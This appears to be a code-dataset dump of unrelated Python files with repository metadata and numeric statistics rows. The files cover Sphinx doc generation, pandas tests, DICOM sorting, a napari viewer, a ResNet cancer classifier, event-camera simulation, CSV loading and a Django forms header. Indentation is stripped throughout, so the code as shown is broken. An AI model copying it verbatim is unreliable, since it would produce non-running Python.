dot_class_path = '%s.%s.rst' % (dot_path, class_name)
rst_filename = os.path.join(folder, dot_class_path)
#dirname = os.path.dirname(rst_filename)
#if not os.path.exists(dirname):
#os.makedirs(dirname)
lines = ''
if is_object:
lines = '%s\n' % class_name
lines += '%s\n' % (len(class_name) * '-')
lines += '.. autoclass:: %s.%s\n' % (dot_path, class_name)
lines += ' :inherited-members:\n'
lines += ' :members:\n'
#lines += ' :private-members:\n'
else:
lines = '%s\n' % class_name
lines += '%s\n' % (len(class_name) * '-')
lines += '.. autoclass:: %s.%s\n' % (dot_path, class_name)
lines += ' :show-inheritance:\n'
lines += ' :inherited-members:\n'
lines += ' :members:\n'
#lines += ' :private-members:\n'
#ASET
#----
#.. autoclass:: pyNastran.bdf.cards.bdf_sets.ASET
#:show-inheritance:
#:inherited-members:
#:members:
#:private-members:
#print(rst_filename)
if lines:
with open(rst_filename, 'w') as rst_file:
rst_file.write(lines)
def main():
if os.path.exists('rsts'):
shutil.rmtree('rsts')
filenames_classes = get_pyfilenames()
filenames_to_rsts(filenames_classes, make_rsts=False)
#py_filename = r'C:\NASA\m4\formats\git\pyNastran\pyNastran\bdf\cards\bdf_sets.py'
#get_classes_in_file(py_filename)
if __name__ == '__main__':
main()
| 35.487437
| 94
| 0.585387
| 864
| 7,062
| 4.543981
| 0.252315
| 0.041263
| 0.024452
| 0.024452
| 0.318136
| 0.226694
| 0.192053
| 0.147988
| 0.089913
| 0.089913
| 0
| 0.007029
| 0.254602
| 7,062
| 198
| 95
| 35.666667
| 0.738792
| 0.184792
| 0
| 0.107692
| 0
| 0
| 0.130519
| 0.007388
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053846
| false
| 0
| 0.038462
| 0
| 0.123077
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee139bfd29a89a7a4a5d77d7a8c7900ad5b256b6
| 4,650
|
py
|
Python
|
tests/utils/postprocess/test_top.py
|
ToucanToco/toucan-data-sdk
|
1d82b7112231b65f8a310327b6d6673d137b7378
|
[
"BSD-3-Clause"
] | 9
|
2017-12-21T23:09:10.000Z
|
2020-08-20T13:53:24.000Z
|
tests/utils/postprocess/test_top.py
|
ToucanToco/toucan-data-sdk
|
1d82b7112231b65f8a310327b6d6673d137b7378
|
[
"BSD-3-Clause"
] | 144
|
2017-11-24T17:23:02.000Z
|
2022-03-28T02:34:15.000Z
|
tests/utils/postprocess/test_top.py
|
ToucanToco/toucan-data-sdk
|
1d82b7112231b65f8a310327b6d6673d137b7378
|
[
"BSD-3-Clause"
] | 5
|
2018-03-07T13:22:01.000Z
|
2021-05-31T11:53:07.000Z
|
import pandas as pd
from toucan_data_sdk.utils.postprocess import top, top_group
def test_top():
""" It should return result for top """
data = pd.DataFrame(
[
{'variable': 'toto', 'Category': 1, 'value': 100},
{'variable': 'toto', 'Category': 1, 'value': 200},
{'variable': 'toto', 'Category': 1, 'value': 300},
{'variable': 'lala', 'Category': 1, 'value': 100},
{'variable': 'lala', 'Category': 1, 'value': 150},
{'variable': 'lala', 'Category': 1, 'value': 250},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'lala', 'Category': 2, 'value': 450},
]
)
# ~~~ without group ~~~
expected = pd.DataFrame(
[
{'variable': 'lala', 'Category': 2, 'value': 450},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'toto', 'Category': 1, 'value': 300},
]
)
kwargs = {'value': 'value', 'limit': 3, 'order': 'desc'}
df = top(data, **kwargs).reset_index(drop=True)
assert df.equals(expected)
# ~~~ with group ~~~
expected = pd.DataFrame(
[
{'variable': 'lala', 'Category': 1, 'value': 150},
{'variable': 'lala', 'Category': 1, 'value': 100},
{'variable': 'lala', 'Category': 2, 'value': 450},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'toto', 'Category': 1, 'value': 200},
{'variable': 'toto', 'Category': 1, 'value': 100},
]
)
kwargs = {'group': ['variable', 'Category'], 'value': 'value', 'limit': -2, 'order': 'desc'}
df = top(data, **kwargs)
assert df.equals(expected)
def test_top_date_strings():
"""It should manage to use top if the column can be interpretated as date"""
df = pd.DataFrame(
{'date': ['2017-01-01', '2017-03-02', '2018-01-02', '2016-04-02', '2017-01-03']}
)
top_df = top(df, value='date', limit=2)
assert top_df['date'].tolist() == ['2016-04-02', '2017-01-01']
top_df = top(df, value='date', limit=3, order='desc')
assert top_df['date'].tolist() == ['2018-01-02', '2017-03-02', '2017-01-03']
top_df = top(df, value='date', limit=3, order='desc', date_format='%Y-%d-%m')
assert top_df['date'].tolist() == ['2018-01-02', '2017-01-03', '2017-03-02']
def test_top_date_strings_temp_column():
"""It should not change existing columns"""
df = pd.DataFrame(
{'date': ['2017-01-01', '2017-03-02'], 'date_': ['a', 'b'], 'date__': ['aa', 'bb']}
)
assert top(df, value='date', limit=2, order='desc').equals(df[::-1])
def test_top_group():
""" It should return result for top_group """
data = pd.DataFrame(
{
'Label': ['G1', 'G2', 'G3', 'G4', 'G5', 'G3', 'G3'],
'Categories': ['C1', 'C2', 'C1', 'C2', 'C1', 'C2', 'C3'],
'Valeurs': [6, 1, 9, 4, 8, 2, 5],
'Periode': ['mois', 'mois', 'mois', 'semaine', 'semaine', 'semaine', 'semaine'],
}
)
# ~~~ with filters ~~~
expected = pd.DataFrame(
{
'Periode': ['mois', 'mois', 'semaine', 'semaine', 'semaine'],
'Label': ['G3', 'G1', 'G5', 'G3', 'G3'],
'Categories': ['C1', 'C1', 'C1', 'C2', 'C3'],
'Valeurs': [9, 6, 8, 2, 5],
}
)
kwargs = {
'group': 'Periode',
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
# ~~~ without groups ~~~
expected = pd.DataFrame(
{
'Label': ['G3', 'G3', 'G3', 'G5'],
'Categories': ['C1', 'C2', 'C3', 'C1'],
'Valeurs': [9, 2, 5, 8],
'Periode': ['mois', 'semaine', 'semaine', 'semaine'],
}
)
kwargs = {
'group': None,
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
# ~~~ with group and function = mean ~~~
expected = pd.DataFrame(
{
'Periode': ['mois', 'mois', 'semaine', 'semaine'],
'Label': ['G3', 'G1', 'G5', 'G4'],
'Categories': ['C1', 'C1', 'C1', 'C2'],
'Valeurs': [9, 6, 8, 4],
}
)
kwargs = {
'group': ['Periode'],
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'function': 'mean',
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
| 33.214286
| 96
| 0.476129
| 519
| 4,650
| 4.204239
| 0.208092
| 0.045371
| 0.070577
| 0.057745
| 0.711274
| 0.633364
| 0.508708
| 0.469753
| 0.425756
| 0.380843
| 0
| 0.078277
| 0.291183
| 4,650
| 139
| 97
| 33.453237
| 0.583738
| 0.065591
| 0
| 0.421053
| 0
| 0
| 0.277675
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.035088
| false
| 0
| 0.017544
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee14c24926c18fc83e37f709865f20c7c3816477
| 2,199
|
py
|
Python
|
MoveRestructure.py
|
bsmarine/dicomConversionToNiftiHCC
|
ea8d4c922a299a2b9e1936bdb08c22d445e48db7
|
[
"BSD-3-Clause"
] | 1
|
2021-06-25T17:13:37.000Z
|
2021-06-25T17:13:37.000Z
|
MoveRestructure.py
|
bsmarine/dicomConversionToNiftiHCC
|
ea8d4c922a299a2b9e1936bdb08c22d445e48db7
|
[
"BSD-3-Clause"
] | null | null | null |
MoveRestructure.py
|
bsmarine/dicomConversionToNiftiHCC
|
ea8d4c922a299a2b9e1936bdb08c22d445e48db7
|
[
"BSD-3-Clause"
] | 1
|
2021-07-08T22:27:57.000Z
|
2021-07-08T22:27:57.000Z
|
import sys
import os
import SimpleITK as sitk
import pydicom
from slugify import slugify
import shutil
import argparse
def gen_dcm_identifiers(in_dir):
##Get Absolute Path For Every DCM File Recursively
dcms_path_list = [os.path.abspath(os.path.join(dire,dcm)) for dire,sub_dir,dcms in os.walk(in_dir) if 'dcm' in str(dcms) for dcm in dcms]
##Output List
output_list = list()
## Generate List with MRN, Accession Number, Series Description, Series Number, Acq Date
for dcm_file in dcms_path_list:
info = pydicom.read_file(dcm_file)
try:
mrn = info[0x010,0x0020][:]
acc = info[0x008,0x0050][:]
series_desc = info[0x0008,0x103e].value
series_num = info[0x0020,0x0011].value
acq_date = info[0x0008,0x0020].value
string = str(series_desc)+"_"+str(series_num)+"_"+str(acq_date)
string_date = slugify(string)
output_list.append([mrn,acc,string_date,dcm_file])
except KeyError:
print ("Error getting metadata from "+str(dcm_file))
return output_list
def create_folders_move(dcm_ids,out_dir):
if os.path.exists(out_dir) == False:
os.mkdir(out_dir)
for i in dcm_ids:
print (i)
if os.path.exists(os.path.join(out_dir,i[0]))==False:
os.mkdir(os.path.join(out_dir,i[0]))
if os.path.exists(os.path.join(out_dir,i[0],i[1]))==False:
os.mkdir(os.path.join(out_dir,i[0],i[1]))
if os.path.exists(os.path.join(out_dir,i[0],i[1],i[2]))==False:
os.mkdir(os.path.join(out_dir,i[0],i[1],i[2]))
try:
shutil.move(i[3],os.path.join(out_dir,i[0],i[1],i[2]))
print ("######## Moving "+str(i[3]))
except:
print ("Error, likely file already exists in destination")
parser = argparse.ArgumentParser(description='MoveRestructureScript')
parser.add_argument("--dicomDir", dest="in_dir", required=True)
parser.add_argument("--outDir", dest="out_dir", required=True)
op = parser.parse_args()
create_folders_move(gen_dcm_identifiers(op.in_dir), op.out_dir)
| 36.04918
| 141
| 0.622556
| 325
| 2,199
| 4.052308
| 0.295385
| 0.059226
| 0.060744
| 0.069096
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0
| 0.038346
| 0.241019
| 2,199
| 60
| 142
| 36.65
| 0.750749
| 0.065939
| 0
| 0.044444
| 0
| 0
| 0.072754
| 0.010254
| 0
| 0
| 0.02832
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.155556
| 0
| 0.222222
| 0.088889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee1671d5719714f90ce4ce8110a4344a83fa25b3
| 2,384
|
py
|
Python
|
mesmerize_napari/cnmf_viz_gui.py
|
nel-lab/mesmerize-napari
|
24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b
|
[
"Apache-2.0"
] | 1
|
2022-01-11T16:18:17.000Z
|
2022-01-11T16:18:17.000Z
|
mesmerize_napari/cnmf_viz_gui.py
|
nel-lab/caiman-napari-prototype
|
24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b
|
[
"Apache-2.0"
] | 12
|
2022-01-11T16:21:01.000Z
|
2022-02-17T04:43:50.000Z
|
mesmerize_napari/cnmf_viz_gui.py
|
nel-lab/mesmerize-napari
|
24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b
|
[
"Apache-2.0"
] | null | null | null |
from PyQt5 import QtWidgets
from .cnmf_viz_pytemplate import Ui_VizualizationWidget
from .evaluate_components import EvalComponentsWidgets
from mesmerize_core.utils import *
from mesmerize_core import *
import caiman as cm
class VizWidget(QtWidgets.QDockWidget):
def __init__(self, cnmf_viewer, batch_item):
QtWidgets.QDockWidget.__init__(self, parent=None)
self.ui = Ui_VizualizationWidget()
self.ui.setupUi(self)
self.cnmf_obj = batch_item.cnmf.get_output()
self.batch_item = batch_item
self.cnmf_viewer = cnmf_viewer
self.eval_gui = EvalComponentsWidgets(cnmf_viewer=cnmf_viewer)
self.ui.pushButtonInputMovie.clicked.connect(self.view_input)
self.ui.pushButtonCnImage.clicked.connect(self.load_correlation_image)
self.ui.pushButtonViewProjection.clicked.connect(self.view_projections)
self.ui.pushButtonEvalGui.clicked.connect(self.show_eval_gui)
self.ui.pushButtonUpdateBoxSize.clicked.connect(self.select_contours)
def _open_movie(self, path: Union[Path, str]):
file_ext = Path(path).suffix
if file_ext == ".mmap":
Yr, dims, T = cm.load_memmap(path)
images = np.reshape(Yr.T, [T] + list(dims), order="F")
self.cnmf_viewer.viewer.add_image(images, colormap="gray")
else:
self.cnmf_viewer.viewer.open(path, colormap="gray")
def view_input(self):
path = self.batch_item.caiman.get_input_movie_path()
full_path = get_full_data_path(path)
self._open_movie(full_path)
def load_correlation_image(self):
corr_img = self.batch_item.caiman.get_correlation_image()
self.cnmf_viewer.viewer.add_image(
corr_img, name=f'corr: {self.batch_item["name"]}', colormap="gray"
)
def view_projections(self):
proj_type = self.ui.comboBoxProjection.currentText()
projection = self.batch_item.caiman.get_projection(proj_type=proj_type)
self.cnmf_viewer.viewer.add_image(
projection,
name=f'{proj_type} projection: {self.batch_item["name"]}',
colormap="gray",
)
def show_eval_gui(self):
self.eval_gui.show()
def select_contours(self):
box_size = self.ui.spinBoxBoxSize.value()
self.cnmf_viewer.select_contours(box_size=box_size, update_box=True)
| 38.451613
| 79
| 0.693792
| 300
| 2,384
| 5.233333
| 0.303333
| 0.063694
| 0.06242
| 0.050955
| 0.166879
| 0.094268
| 0.040764
| 0
| 0
| 0
| 0
| 0.000527
| 0.203859
| 2,384
| 61
| 80
| 39.081967
| 0.82666
| 0
| 0
| 0.04
| 0
| 0
| 0.042785
| 0.020973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.14
| false
| 0
| 0.12
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2135f4afd77e09b1a2e652846d3ab3f3aa9ee1
| 3,642
|
py
|
Python
|
model/gastric_cancer_ResNet_cnn.py
|
bd-z/Gastric_Biopsy_Cancer_Detector
|
fac18b6484ff10b09b50eb6d81af9984f9fe3019
|
[
"MIT"
] | 1
|
2022-01-08T14:19:31.000Z
|
2022-01-08T14:19:31.000Z
|
model/gastric_cancer_ResNet_cnn.py
|
bd-z/Gastric_Biopsy_Cancer_Detector
|
fac18b6484ff10b09b50eb6d81af9984f9fe3019
|
[
"MIT"
] | null | null | null |
model/gastric_cancer_ResNet_cnn.py
|
bd-z/Gastric_Biopsy_Cancer_Detector
|
fac18b6484ff10b09b50eb6d81af9984f9fe3019
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 3 20:33:21 2021
@author: zhang
"""
import os
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import tensorflow.keras as keras
from tensorflow.keras.preprocessing import image
from tensorflow.keras import backend as K
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.applications.resnet_v2 import ResNet50V2
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Flatten, Dense, Dropout, Conv2D, BatchNormalization, MaxPool2D ,Activation, MaxPooling2D
def data_table(folder):
'''create a dataframe which has 'id' and 'label' columns. The id column is the path of each image
and the label column contain 1 and 0 which indicate cancer cells exist or not
'''
p=os.walk(folder)
list_empty=[]
dict_empty={}
for path, dir_list,file_list in p:
for file_name in file_list:
file_path=os.path.join(path,file_name)
list_empty.append(file_path)
for file_path in list_empty:
if 'non_cancer' in file_path:
label=0
else:
label=1
dict_empty['{}'.format(file_path)]=label
df = pd.DataFrame.from_dict(dict_empty, orient='index',columns=['label'])
df = df.reset_index().rename(columns={'index':'id'})
df = shuffle(df)
return df
#folder where the images data stored
f=r'G:\BaiduNetdiskDownload\train'
df_full=data_table(f)
#define X and y
X=df_full['id']
y=df_full['label']
# train and test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 100) # split into test and train sets
def slice_load(file_list):
''' load the images'''
images=[]
for filename in file_list:
im = image.load_img(filename,target_size=(512, 512, 3))
b = image.img_to_array(im)
images.append(b)
return images
X_train_image=slice_load(X_train)
X_train_array=np.array(X_train_image)/255
X_test_image=slice_load(X_test)
X_test_array=np.array(X_test_image)/255
X_train_array.shape
type(y_train)
#clear sessions
K.clear_session()
input_shape = (512, 512, 3)
# transfer learning with ResNet50V2
resMod = ResNet50V2(include_top=False, weights='imagenet',
input_shape=input_shape)
#frozen the layers in ResNet50V2
for layer in resMod.layers:
layer.trainable = False
# build model
model = Sequential()
model.add(resMod)
model.add(tf.keras.layers.GlobalAveragePooling2D())
#1st Dense: (None, 60)
model.add(keras.layers.Dense(60, activation='relu'))
#regularization with penalty term
model.add(Dropout(0.2))
# 2nd Dense: (None, 50)
model.add(keras.layers.Dense(50, activation='relu'))
#regularization
model.add(keras.layers.BatchNormalization())
# 2nd Dense: (None, 50)
model.add(keras.layers.Dense(50, activation='relu'))
model.add(keras.layers.BatchNormalization())
# Output Layer: (None, 1)
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.summary()
# Compile
model.compile(loss='categorical_crossentropy', optimizer='adam',\
metrics=['accuracy'])
#add early stoping
callback = EarlyStopping(monitor='val_loss', patience=3)
#(5)Train
results=model.fit(X_train_array, y_train, batch_size=64, epochs=50, verbose=1, \
validation_split=0.2,callbacks=[callback], shuffle=True)
model.evaluate(X_test_array, y_test)
results.history['val_accuracy']
#save model
model.save(r'C:\Users\zhang\GitHub_projects\GTBR\Gastric_Biopsy_Cancer_Detector\model\resnet_gastric.h5')
| 23.197452
| 124
| 0.720209
| 536
| 3,642
| 4.740672
| 0.375
| 0.028335
| 0.044864
| 0.044864
| 0.090516
| 0.042503
| 0.042503
| 0.042503
| 0.042503
| 0.042503
| 0
| 0.027988
| 0.166118
| 3,642
| 156
| 125
| 23.346154
| 0.808693
| 0.175178
| 0
| 0.054054
| 0
| 0
| 0.08098
| 0.048656
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.175676
| 0
| 0.22973
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee245853feab4e3b1a6bbf63e986448df5eef06f
| 2,280
|
py
|
Python
|
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
import torch
import matplotlib.pyplot as plt
import numpy as np
import glob
import cv2
from esim_torch import EventSimulator_torch
def increasing_sin_wave(t):
return (400 * np.sin((t-t[0])*20*np.pi)*(t-t[0])+150).astype("uint8").reshape((-1,1,1))
if __name__ == "__main__":
c = 0.2
refractory_period_ns = 5e6
esim_torch = EventSimulator_torch(contrast_threshold_neg=c,
contrast_threshold_pos=c,
refractory_period_ns=refractory_period_ns)
print("Loading images")
timestamps_s = np.genfromtxt("../esim_py/tests/data/images/timestamps.txt")
images = increasing_sin_wave(timestamps_s)
timestamps_ns = (timestamps_s * 1e9).astype("int64")
log_images = np.log(images.astype("float32") / 255 + 1e-4)
# generate torch tensors
print("Loading data to GPU")
device = "cuda:0"
log_images = torch.from_numpy(log_images).to(device)
timestamps_ns = torch.from_numpy(timestamps_ns).to(device)
# generate events with GPU support
print("Generating events")
events = esim_torch.forward(log_images, timestamps_ns)
# render events
image = images[0]
print("Plotting")
event_timestamps = events['t']
event_polarities = events['p']
i0 = log_images[0].cpu().numpy().ravel()
fig, ax = plt.subplots(ncols=2)
timestamps_ns = timestamps_ns.cpu().numpy()
log_images = log_images.cpu().numpy().ravel()
ax[0].plot(timestamps_ns, log_images)
ax[0].plot(timestamps_ns, images.ravel())
ax[0].set_ylim([np.log(1e-1),np.log(1 + 1e-4)])
ax[0].set_ylabel("Log Intensity")
ax[0].set_xlabel("Time [ns]")
ax[1].set_ylabel("Time since last event [ns]")
ax[1].set_xlabel("Timestamp of event [ns]")
ax[1].set_xlim([0,3e8])
for i in range(-10,3):
ax[0].plot([0,timestamps_ns[-1]], [i0+i*c, i0+i*c], c='g')
event_timestamps = event_timestamps.cpu().numpy()
for i, (t, p) in enumerate(zip(event_timestamps, event_polarities)):
color = "r" if p == -1 else "b"
ax[0].plot([t, t], [-3, 0], c=color)
if i > 0:
ax[1].scatter([t], [t-event_timestamps[i-1]], c=color)
ax[1].plot([0,3e8], [refractory_period_ns, refractory_period_ns])
plt.show()
| 33.043478
| 91
| 0.638158
| 340
| 2,280
| 4.082353
| 0.323529
| 0.07781
| 0.064842
| 0.017291
| 0.097983
| 0.051873
| 0
| 0
| 0
| 0
| 0
| 0.038631
| 0.205263
| 2,280
| 68
| 92
| 33.529412
| 0.727373
| 0.030263
| 0
| 0
| 0
| 0
| 0.094288
| 0.019492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019608
| false
| 0
| 0.117647
| 0.019608
| 0.156863
| 0.078431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee24a1450e91db84cc047da4850276c21c83ee5a
| 6,642
|
py
|
Python
|
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
load_csv.py
This script controlls all load csv information.
Created on: Fri Jul 16 15:54:43 2021
Author: Alex K. Chew (alex.chew@schrodinger.com)
Copyright Schrodinger, LLC. All rights reserved.
"""
# Loading modules
import os
import pandas as pd
import numpy as np
# Importing filtration tools
from .filtration import filter_by_variance_threshold
# Defining default columns
DEFAULT_INDEX_COLS = ["Title", "Entry Name"]
# Loading experimental data
def load_property_data(csv_data_path,
keep_list = []):
"""
This function loads property data from spreadsheet
Parameters
----------
csv_data_path: [str]
path to csv file
keep_list: [list, default = []]
list of columns to keep. If None, the entire dataframe is outputted.
Returns
-------
csv_data: [df]
dataframe containing csv information with the keep list
"""
# Loading dataframe
csv_data = pd.read_csv(csv_data_path)
# Checking if list is empty
if len(keep_list) == 0:
return csv_data
else:
return csv_data[keep_list]
# Function to load descriptor data
def load_descriptor_data(csv_path,
clean_data = True,
filter_by_variance = True,
output_filtered_data = False,
na_filter = 'remove',
default_index_cols = DEFAULT_INDEX_COLS):
"""
This function loads the descriptor information. Note that all:
- non-numerical descriptors are removed automatically.
- missing NaN columns are removed automatically
Parameters
----------
csv_path : str
Path to csv file
clean_data: logical, default = True
True if you want to clean the data by removing non-numerical descriptors / NaN columns
output_filtered_data: logical, optional
True if you want to output the filtered data as a separate csv file.
The default value is False.
filter_by_variance: logical, optional
True if you want to filter by variance. By default, this is True.
na_filter: str, optional
Method of dealing with non-existing numbers. The different methods
are summarized below:
'remove': (default)
Remove all columns that have non-existing numbers.
'fill_with_zeros':
Fill all nans with zeros. It will also look for infinities and replace them
with zeros.
Returns
-------
output_df : str
dataframe containing csv file
"""
# Loading csv file
csv_df = pd.read_csv(csv_path)
# Printing
print("\nLoading CSV file: %s"%(csv_path))
# Checking if you want to clean the dataframe
if clean_data is True:
# Cleaning the dataframe
if na_filter == 'remove':
print("Removing all columns with nan's")
csv_df_nonan = csv_df.dropna(axis=1) # Removes NaN values
elif na_filter == 'fill_with_zeros':
print("Filling nan's with zeros")
csv_df_nonan = csv_df.fillna(0)
csv_df_nonan.replace([np.inf, -np.inf], 0)
else:
print("Error! na_filter of %s is not defined!"%(na_filter))
# Selecting only portions of the dataframe with numbers.
csv_df_nums = csv_df_nonan.select_dtypes(['number']) #
try:
# Removing cols with low variance
if filter_by_variance is True:
output_df = filter_by_variance_threshold(X_df = csv_df_nums)
else:
print("Skipping variance filtration for %s"%(csv_path))
output_df = csv_df_nums
# Adding back the index cols to the beginning
for each_col in default_index_cols[::-1]: # Reverse order
if each_col in csv_df and each_col not in output_df:
output_df.insert (0, each_col, csv_df[each_col])
except ValueError: # Happens when you have a blank dataframe
print("No columns found that matches filtration for %s"%(csv_path))
cols_to_include = [each_col for each_col in default_index_cols if each_col in csv_df.columns]
output_df = csv_df[cols_to_include]
# Storing dataframe
if output_filtered_data is True:
# Getting path without
csv_path_without_ext = os.path.splitext(csv_path)[0]
# Getting filtered nomenclature
csv_path_with_new_name = csv_path_without_ext + "_filtered.csv"
# Storing
print("Storing filtered data to: %s"%(csv_path_with_new_name))
output_df.to_csv(csv_path_with_new_name, index = False)
return output_df
else:
return csv_df
# Function to load multiple descriptor datas
def load_multiple_descriptor_data(default_csv_paths,
descriptor_list = ["2d_descriptors",
"3d_descriptors",],
**args
):
"""
This function loads multiple descriptor data given a descriptor list.
Parameters
----------
default_csv_paths: dict
dictionary of csv paths
descriptor_list : list
list of descriptors to load from dictionary
Remainder of arguments go into the load descriptor function
Returns
-------
descriptor_df_dict: dict
dictionary containing descritpors
"""
# Loading all descriptor files
descriptor_df_dict = { each_descriptor_key: load_descriptor_data(default_csv_paths[each_descriptor_key], **args)
for each_descriptor_key in descriptor_list }
return descriptor_df_dict
# Function to strip title and etc to get numerical descriptors only
def strip_df_index(df,
col2remove = DEFAULT_INDEX_COLS):
"""
This function strips the dataframe from the index information.
Parameters
----------
df : dataframe
pandas dataframe containing descriptor information.
col2remove: list
list of columns to remove from the dataframe.
Returns
-------
df_clean: dataframe]
pandas dataframe without any "Title" or index information
"""
# Dropping the columns
df_clean = df.drop(columns = col2remove,
errors='ignore')
return df_clean
| 33.545455
| 117
| 0.609907
| 805
| 6,642
| 4.823602
| 0.273292
| 0.019315
| 0.024723
| 0.011331
| 0.12104
| 0.058202
| 0.029874
| 0
| 0
| 0
| 0
| 0.005773
| 0.321891
| 6,642
| 198
| 118
| 33.545455
| 0.85635
| 0.448961
| 0
| 0.061538
| 0
| 0
| 0.096067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.061538
| 0
| 0.215385
| 0.107692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee256a737518580b47e962df223472702fb695b6
| 6,013
|
py
|
Python
|
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import datetime
from django import forms
from django.views.generic.edit import UpdateView
from contest.models import Contest
